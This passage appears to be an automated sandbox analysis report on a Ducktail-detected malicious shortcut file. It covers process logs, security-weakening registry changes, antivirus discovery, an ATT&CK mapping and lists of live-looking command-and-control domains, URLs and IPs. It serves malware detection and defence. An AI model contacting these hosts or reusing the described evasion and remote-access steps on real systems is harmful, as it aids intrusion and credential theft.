      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\Temp\svczHost.exeCode function: 17_2_00007FF78AD8BFE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,17_2_00007FF78AD8BFE0
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Modifies security policies related information
      Source: C:\Windows\Temp\myRdpService.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa DisableRestrictedAdmin
      Source: powershell.exe, 00000002.00000002.3129564568.0000023D446D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s Defender\MsMpeng.exe
      Source: powershell.exe, 00000002.00000002.3129564568.0000023D446B7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3137229168.00000245459D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3129564568.0000023D446C6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3740096561.000001EE6D155000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3745307018.000001EE6D1C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected Ducktail
      Source: Yara matchFile source: Process Memory Space: svczHost.exe PID: 5060, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected Ducktail
      Source: Yara matchFile source: Process Memory Space: svczHost.exe PID: 5060, type: MEMORYSTR
      Allows multiple concurrent remote connection
      Source: C:\Windows\Temp\myRdpService.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fSingleSessionPerUser

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure1
      Spearphishing Link      		321
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Disable or Modify Tools      		OS Credential Dumping1
      System Time Discovery      		1
      Remote Desktop Protocol      		1
      Archive Collected Data      		3
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts12
      Command and Scripting Interpreter      		11
      Windows Service      		11
      Windows Service      		2
      Deobfuscate/Decode Files or Information      		LSASS Memory1
      File and Directory Discovery      		Remote Desktop ProtocolData from Removable Media11
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Service Execution      		Logon Script (Windows)11
      Process Injection      		1
      Obfuscated Files or Information      		Security Account Manager114
      System Information Discovery      		SMB/Windows Admin SharesData from Network Shared Drive11
      Non-Standard Port      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts5
      PowerShell      		Login HookLogin Hook1
      Software Packing      		NTDS431
      Security Software Discovery      		Distributed Component Object ModelInput Capture4
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets11
      Process Discovery      		SSHKeylogging15
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      File Deletion      		Cached Domain Credentials241
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
      Masquerading      		DCSync1
      Application Window Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
      Virtualization/Sandbox Evasion      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
      Process Injection      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551869 Sample: SPENDINGONDIGITALMARKETING_... Startdate: 08/11/2024 Architecture: WINDOWS Score: 100 90 uyt1n8ded9fb380.com 2->90 92 chrome.cloudflare-dns.com 2->92 100 Malicious sample detected (through community Yara rule) 2->100 102 Windows shortcut file (LNK) starts blacklisted processes 2->102 104 Yara detected Ducktail 2->104 106 12 other signatures 2->106 11 cmd.exe 1 2->11         started        14 svczHost.exe 2->14         started        17 myRdpService.exe 2->17         started        signatures3 process4 dnsIp5 128 Windows shortcut file (LNK) starts blacklisted processes 11->128 130 Suspicious powershell command line found 11->130 132 Encrypted powershell cmdline option found 11->132 144 2 other signatures 11->144 20 powershell.exe 14 49 11->20         started        25 conhost.exe 1 11->25         started        84 C:\Windows\Temp\myRdpService.exe, PE32+ 14->84 dropped 134 Multi AV Scanner detection for dropped file 14->134 27 powershell.exe 14->27         started        29 cmd.exe 14->29         started        31 cmd.exe 14->31         started        33 7 other processes 14->33 86 206.206.126.252, 49758, 8008 HYPEENT-SJUS United States 17->86 88 23.88.71.29, 49757, 49759, 8000 ENZUINC-US United States 17->88 136 Allows multiple concurrent remote connection 17->136 138 Modifies security policies related information 17->138 140 Reads the Security eventlog 17->140 142 Reads the System eventlog 17->142 file6 signatures7 process8 dnsIp9 94 uyt1n8ded9fb380.com 172.67.137.62, 443, 49728, 49729 CLOUDFLARENETUS United States 20->94 78 C:\Users\user\AppData\...\wpyeyr2r.cmdline, Unicode 20->78 dropped 116 Windows shortcut file (LNK) starts blacklisted processes 20->116 118 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 20->118 120 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 20->120 124 3 other signatures 20->124 35 cmd.exe 1 20->35         started        38 powershell.exe 3 27 20->38         started        40 csc.exe 3 20->40         started        43 conhost.exe 20->43         started        122 Loading BitLocker PowerShell Module 27->122 45 conhost.exe 27->45         started        47 net.exe 29->47         started        49 3 other processes 29->49 51 2 other processes 31->51 53 8 other processes 33->53 file10 signatures11 process12 file13 108 Windows shortcut file (LNK) starts blacklisted processes 35->108 110 Suspicious powershell command line found 35->110 112 Encrypted powershell cmdline option found 35->112 55 powershell.exe 43 35->55         started        59 conhost.exe 35->59         started        114 Loading BitLocker PowerShell Module 38->114 61 AcroRd32.exe 38->61         started        63 conhost.exe 38->63         started        82 C:\Users\user\AppData\Local\...\wpyeyr2r.dll, PE32 40->82 dropped 65 cvtres.exe 1 40->65         started        67 net1.exe 47->67         started        signatures14 process15 file16 80 C:\Windows\Temp\svczHost.exe, PE32+ 55->80 dropped 126 Potential dropper URLs found in powershell memory 55->126 69 conhost.exe 55->69         started        71 WmiPrvSE.exe 55->71         started        73 RdrCEF.exe 61->73         started        signatures17 process18 process19 75 RdrCEF.exe 73->75         started        dnsIp20 96 23.41.168.139, 443, 49745 ZAYO-6461US United States 75->96 98 chrome.cloudflare-dns.com 172.64.41.3, 443, 49743, 49744 CLOUDFLARENETUS United States 75->98

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnk8%ReversingLabs

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Windows\Temp\svczHost.exe16%ReversingLabsWin64.Malware.Generic

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://uyt1n8ded9fb380.com/StaticFile/TermServiceTryRun/530%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e90%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d7510%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/93f36e811e874b78005b821ed94567028efd4af63744edf59ae10ea6014e493f11f03c7c73e0ddc766cd6e33c169ba4adf731aab45a3bef0c2baa55bb4969e4b535f5d0c46f123fe9927806d2388a1e5f8eeee52a1dcd986e80a54646d888f53e12cce2b10ff81035b88a1bba0cb3f040%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118fe714ca00%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33a10%Avira URL Cloudsafe
      http://uyt1n8ded9fb380.com0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c8630240%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com0%Avira URL Cloudsafe
      http://html4/loose.dtd0%Avira URL Cloudsafe
      http://.css0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e93b36f1509e1bece2e4505fef0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321183b73b8235764f47dd55c3fa53226e74b0%Avira URL Cloudsafe
      http://osoft.co0%Avira URL Cloudsafe
      http://206.206.126.252:8008/client/ws0%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.pngXzK0%Avira URL Cloudsafe
      http://crl.micros=30%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211874eaf2d70%Avira URL Cloudsafe
      http://crl.micr0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/775e5047ced9e7adcec83e62ab773682b1856875a6cad7da93c53afaf38114a9800%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec46903b0dfb975b9987fd6729e67c891c4b3290%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
      http://.jpg0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/67f0828de55a7b0ae4143def41be5826e35728fe516a68fd7776f4f474689bc6ab0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211874eaf2d7bf53485b09f44dc9fdc794070%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file3/0e8334e27730f66442615276cd9b2fc8cf5e6a24376c7dc468f7998d07140480f560003411e5c2edaf5d85d750c05659a2be7616557804e0bfc96dd179470fe4c278171f9e81e55643e7a125dc57e9656a5ad8c0cfb4383d01580a4ada31faea/Windows%20Defender/16/16/user/1820%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/df74c18f34c2e710d864267392a9e7dd536421db41569695baf1b4e12a83cfb1370%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec46903b0dfb975b9987fd6729e67c891c4b329b887232148c7de62a277aa7bb9f7bb172d0ba0fe9be28b36313fd0fe9b172de332f05512cd1a8b06a678d6fb6ee2d640939cb40f267bbf685fe9daffed49f60%Avira URL Cloudsafe
      https://go.micro0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321183b73b8230%Avira URL Cloudsafe
      http://23.88.71.29:8000/client/ws0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de0%Avira URL Cloudsafe
      https://.AppV.AppVC0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33a1ad49ca3cce39415efa5e154367a48c9b2235950ff73e0aa6e501ee70b1a57fd20e0e662cce5de5e764c8ea69e8f5460905e960f2da5e2d0f365f522005f31ce54fbcd4e6cc47d74d60a5e59c2a76ec0%Avira URL Cloudsafe
      http://uyt1n8ded9fb380.com/api/check0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118fe714ca0926b898b3d3eca0a81e1c2100%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/D0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file3/0e8334e27730f66442615276cd9b2fc8cf5e6a24376c7dc468f7998d07140480f50%Avira URL Cloudsafe
      http://crl.micro0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/StaticFile/RdpService/32h0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/df74c18f34c2e710d864267392a9e7dd536421db41569695baf1b4e12a83cfb137d5fed4fab389dc3fe1f9d14e2ea9b0b1c6f436ead6c833a67fc34705a34ce37f99ec390c3f84cff14e2301a6a62566a46ff50f8be9ce2a5ac5ee46c1890e16fc40853878a3246bd074c17326c341580%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/StaticFile/RdpService/320%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/67f0828de55a7b0ae4143def41be5826e35728fe516a68fd7776f4f474689bc6ab22273c73b70a1db6a1d1a5a722db57826cdbaf9bb1da919ab6b53967c4bf044fb82b81afdbf15569d5eccde03bc8c4a7a71498eb1d6b80d2600766aa798119e9744ccb9a12497618e8c219872620360%Avira URL Cloudsafe
      http://crl.microsof0%Avira URL Cloudsafe
      https://uyt1n8ded9fb380.com/file2/93f36e811e874b78005b821ed94567028efd4af63744edf59ae10ea6014e493f110%Avira URL Cloudsafe
      http://uyt1n8ded9fb380.com:443/x0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      chrome.cloudflare-dns.com
      		172.64.41.3
      		truefalse
        		high
        uyt1n8ded9fb380.com
        		172.67.137.62
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://uyt1n8ded9fb380.com/file2/93f36e811e874b78005b821ed94567028efd4af63744edf59ae10ea6014e493f11f03c7c73e0ddc766cd6e33c169ba4adf731aab45a3bef0c2baa55bb4969e4b535f5d0c46f123fe9927806d2388a1e5f8eeee52a1dcd986e80a54646d888f53e12cce2b10ff81035b88a1bba0cb3f04false
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/StaticFile/TermServiceTryRun/53false
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e93b36f1509e1bece2e4505feffalse
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321183b73b8235764f47dd55c3fa53226e74bfalse
          • Avira URL Cloud: safe
          		unknown
          http://206.206.126.252:8008/client/wsfalse
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211874eaf2d7bf53485b09f44dc9fdc79407false
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/file3/0e8334e27730f66442615276cd9b2fc8cf5e6a24376c7dc468f7998d07140480f560003411e5c2edaf5d85d750c05659a2be7616557804e0bfc96dd179470fe4c278171f9e81e55643e7a125dc57e9656a5ad8c0cfb4383d01580a4ada31faea/Windows%20Defender/16/16/user/182false
          • Avira URL Cloud: safe
          		unknown
